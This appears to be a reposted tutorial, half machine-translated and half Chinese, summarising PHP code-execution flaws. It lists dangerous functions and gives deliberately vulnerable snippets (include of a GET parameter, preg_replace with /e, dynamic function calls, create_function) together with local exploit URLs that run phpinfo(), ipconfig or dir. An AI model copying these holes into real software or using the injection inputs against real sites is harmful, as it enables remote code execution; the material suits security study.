This article introduces a summary of PHP code execution vulnerabilities, which has certain reference value. Now I share it with everyone. Friends in need can refer to it
ref : http://blog.csdn.net/kuangmang/article/details/27170309
ref : http://blog.csdn.net/fuckcat_2333/article/details /52125951
The functions in php that can execute code are: eval(), assert(), ``, system(), exec(), shell_exec(), passthru(), pcntl_exec()
When the parameters (parts) in these functions are controllable, command injection vulnerabilities may occur. Escapeshellarg is usually used to process parameters, but there is a vulnerability in this function in the lower version of the PHP library function (reason: backslashes are not filtered on Windows), so you need to pay attention.
When input variables are included in file inclusion functions (include, include_once, require, require_once), code injection may occur.
Conditions: allow_url_include=On, PHP Version>=5.2.0
demo code:
<?phpinclude($_GET['a']);?>
Visit http://127.0.0.1/demo.php?a=data:text/plain, , phpinfo() is executed.
preg_replace() function:
When the /e mode modifier exists in pattern and matches, the code in replacement is allowed to be executed.
条件:magic_quotes_gpc=Off,pattern参数中注入/e选项;
demo code:
<?phpecho $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\\1', $var);?>访问http://127.0.0.1/preg_replace1.php?reg=%3C/php%3E/e
即会执行phpinfo()
条件:pattern参数中带/e
<?phppreg_replace("/testxxx/e",$_GET['h'],"jutst test testxxx!");?>提交 http://127.0.0.1/demo2.php?h=phpinfo()时, 即 执行phpinfo()。
<?php$dyn_func = $_GET['dyn_func']; $argument = $_GET['argument']; $dyn_func($argument);?>
当http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig时,执行ipconfig命令
关键函数:create_function
demo code:
<?php$foobar = $_GET['foobar'];$dyn_func = create_function('$foobar', "echo $foobar;");$dyn_func('');?>
当提交http://127.0.0.1/create_function.php?foobar=system%28dir%29时,执行dir命令
array_map()函数
ob_start()函数???
函数处理函数:http://www.php.net/manual/zh/book.funchand.php
相关推荐:
The above is the detailed content of Summary of PHP code execution vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
